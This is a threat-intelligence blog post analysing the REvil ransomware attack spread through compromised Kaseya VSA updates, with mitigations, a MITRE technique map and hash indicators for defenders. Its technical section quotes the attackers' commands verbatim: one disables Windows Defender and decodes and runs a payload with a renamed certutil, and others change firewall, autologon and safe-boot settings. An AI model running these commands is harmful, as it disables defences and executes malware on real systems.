Analyzing the REvil Ransomware Attack

Bajrang Mane

Last updated on: December 22, 2022

Over the past year, there has been a rise in extortion malware, e.g. Nefilim and Darkside, which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.

In a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, Kaseya announced its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers’ goal was monetary gain rather than cyber espionage.

The attacks have been attributed to REvil, ransomware was first identified in April 2019 according to MITRE. REvil is a ransomware family that has been linked to GOLD SOUTHFIELD, a financially motivated group that operates a “Ransomware as a service” model. This group distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers.

REvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.

Fig. 1: Dark website

Technical Details

Initial access

The ransomware was delivered via a malicious update payload sent out to the Kaseya VSA server platform. The REvil gang used a Kaseya VSA zero-day vulnerability (CVE-2021-30116)  in the Kaseya  VSA server platform.

Security researchers at Huntress Labs and TrueSec have identified three zero-day vulnerabilities potentially used into attacks against their clients, including:

  • Authentication Bypass Vulnerability
  • Arbitrary File Upload Vulnerability
  • Code Injection Vulnerability

Multiple sources have stated that the following file was used to install and execute the ransomware attack on Windows systems:

The “Kaseya VSA Agent Hot-fix” procedure ran the following command: 

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

The above command disables Windows Defender, copies and renames certutil.exe to %SystemDrive%\Windows, and decrypts the agent.crt file. Certutil.exe is mostly used as a “living-off-the-land” binary and is capable of downloading and decoding web-encoded content. In order to avoid detection, the attacker copied this utility as %SystemDrive%\cert.exe and executed the malicious payload agent.exe.

agent.exed55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

The agent.exe contains two resources (MODLS.RC, SOFIS.RC) in it as shown in the following image.

Fig. 2: Resource from agent.exe

Agent.exe dropped these resources in the windows folder. Resources named MODLIS and SOFTIS were dropped as mpsvc.dll and MsMpEng.exe respectively.

MODLISe2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
mpsvc.dll8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
SOFTIS33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
MsMpEng.exe33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a

MsMpeng.exe is an older version of Microsoft’s Antimalware Service executable which is vulnerable to a DLL side-loading attack. In a DLL side-loading attack, malicious code is in a DLL file with a similar name which is required for the target executable.

Fig. 3: Version information of MsMpeng.exe
Fig. 4: Digital certificate information of MsMpeng.exe

Agent.exe then drops MsMpeng.exe and mpsvc.dll. After dropping these two files, agent.exe executes MsMpeng.exe as shown in the following image.

Fig. 5: Drop files and create a process of MsMpEng.exe

Ransomware Execution

When MpMseng.exe runs and calls the ServiceCrtMain, the Malicious Mpsvc.dll loads and gets loaded and executed.

Fig. 6: ServiceCrtMain call function of MsMpEng.exe
Fig. 7: ServiceCrtMain call function of MsMpEng.exe

Ransomware uses OpenSSL to conduct its Cryptographic Operations.

Fig. 8: Use OpenSSL to conduct Cryptographic Operations

Malware uses ‘CreateFileMappingW’ and ‘MapViewOfFile’ functions to bring code in memory. ‘CreateFileMapping’ function is useful to load a file into memory. The function creates a handle to the mapping while the ‘MapViewOfFile’ function maps the file into memory space and returns a pointer to the start of the mapped file.

Fig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory 

Malware allocates memory and decrypts the main payload (PE file) in memory. Malware removes some unused magic constants from the header to evade it. Magic constants such as 0x4D5A (MZ) 0x5045 (PE). This method requires loading and executing a payload just like a shellcode.

Nowadays most of malware authors use custom packers, these packers, unpack and load payload module without PE Header magic constants at load time. These Packers keep other relevant information from PE Header, such as section header, API import, and relocations data, etc.

Fig. 10: Main Payload 

Malware Decrypts and bring config file. Config file is in JSON format.

Fig. 11: Config File

Config file contain following fields.

FieldDefinition
pk Public key in base 64 
pid Version ID 
sub tag Number 
dbg Is it dbg mode 
et encryption type 
wipe wipe folder flag 
fld Folder list that wants to to skip during the encryption process 
fls File list that wants to to skip during the encryption process 
ext file extension that wants to to skip during the encryption process 
wfld The folder it wants to wipe 
prc Process name list it wants to terminate 
dmn Potential list of C&C Domains 
net Communication flag 
svc Service name list that wants to stop 
nbody Ransomware note in base64 format 
nname Ransomware note file extension 
exp Flag to local privledge escalation 
img Ransomware note that will be in bitmap form 
arn Persistence flag 
rdmcnt Readme count 

Ransomware makes the following changes in the local Firewall rule.

“netsh advfirewall firewall set rule group==”Network Discovery” new enable=Yes”

Fig. 12: Command to change local firewall

It creates the following Registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter

The following values are added in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter:

96Ia6 = {Hex Value}
Ed7 = {Hex Value}
JmfOBvhb = {Hex Value}
QIeQ = {Hex Value}
Ucr1RB = {Hex Value}
wJWsTYE = .{appended extension to files after encryption}

The malware adds registry values under the following Registry Key. 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

  • AutoAdminLogon = 1 
  • DefaultUserName = {Current User Name} 
  • DefaultPassword = “DTrump4ever” 

With the above Registry values, windows will automatically log in with new account information. 

The malware executes the following commands to force the computer to boot into safe mode with Networking:
bcdedit /set {current} safeboot network 

Also, malware add the same command in Registry under  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 

*MarineLePen = bcdedit /set {current} safeboot network 

Finally, a ransom note is dropped using a random filename for example “s5q78-readme.txt”.

Fig. 13: Ransom note

Dashboard

To track your exposure, download and run the Kaseya (REvil RansomWare) dashboard.

Artifact

  • The group launches 0day authorization bypass/SQL injection attack via the userFilterTableRpt.asp file.
  • In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).
  • The group delivers a PowerShell payload that disables Windows Defender.
  • The group copied and renamed certutil.exe to cert.exe before running the commands.
  • The group uses certutil.exe to decode and execute the previously uploaded agent.crt to agent.exe files.
  • The group uploaded a .js file masqueraded as a .jpg file – screenshot.jpg.
  • The group has used services like Shodan to collect a list of targets before attacking.
  • The group encrypts files on victim systems and demands a ransom to decrypt the files.

REvil TTP Map

ReconnaissanceInitial AccessExecutionDefense EvasionCommand and ControlImpact
Search Open Technical Databases: Scan Databases (T1596.005)Exploit Public-Facing Application (T1190)Command and Scripting Interpreter: PowerShell (T1059.001)Indicator Removal on Host: File Deletion (T1070.004)Ingress Tool Transfer (T1105)Data Manipulation: Stored Data Manipulation (T1565.001)
Deobfuscate/Decode Files or Information (T1140)Data Encrypted for impact (T1486)
Masquerading (T1036)Defacement: Internal Defacement (T1491.001)
Masquerading: Rename System Utilities (T1036.003)
Hijack Execution Flow: DLL Side-Loading (T1574.002)
Subvert Trust Controls: Code Signing (T1553.002)
Impair Defenses: Disable or Modify System Firewall (T1562.004)
Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)
Modify Registry (T1112)
Impair Defenses: Disable or Modify Tools (T1562.001)

Mitigation or Additional Important Safety Measures

Network

  • Keep strong and unique passwords for login accounts.
  • Disable RDP if not used. If required change the RDP port to a non-standard port.
  • Configure firewall in the following way:
    • Deny access to Public IPs to important ports (in this case RDP port 3389),
    • Allow access to only IPs which are under your control.
  • Use VPN to access the network, instead of exposing RDP to the Internet. Possibility to implement Two Factor Authentication (2FA).
  • Set lockout policy which hinders credentials guessing.
  • Create a separate network folder for each user when managing access to shared network folders.

Take regular data backup

  • Protect systems from ransomware by periodically backing up important files regularly and keep a recent backup copy offline. Encrypt your backup.
  • If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.
  • Always use a combination of online and offline backup.
  • Do not keep offline backups connected to your system as this data could be encrypted when ransomware strike.

Keep software updated

  • Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.
  • Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.
  • Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.
  • Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.

Having minimum required privileges

  • Do not assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator.  

Indicators of Compromise (IOCs)

SHA256

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2

References

Share your Comments

Comments

Your email address will not be published. Required fields are marked *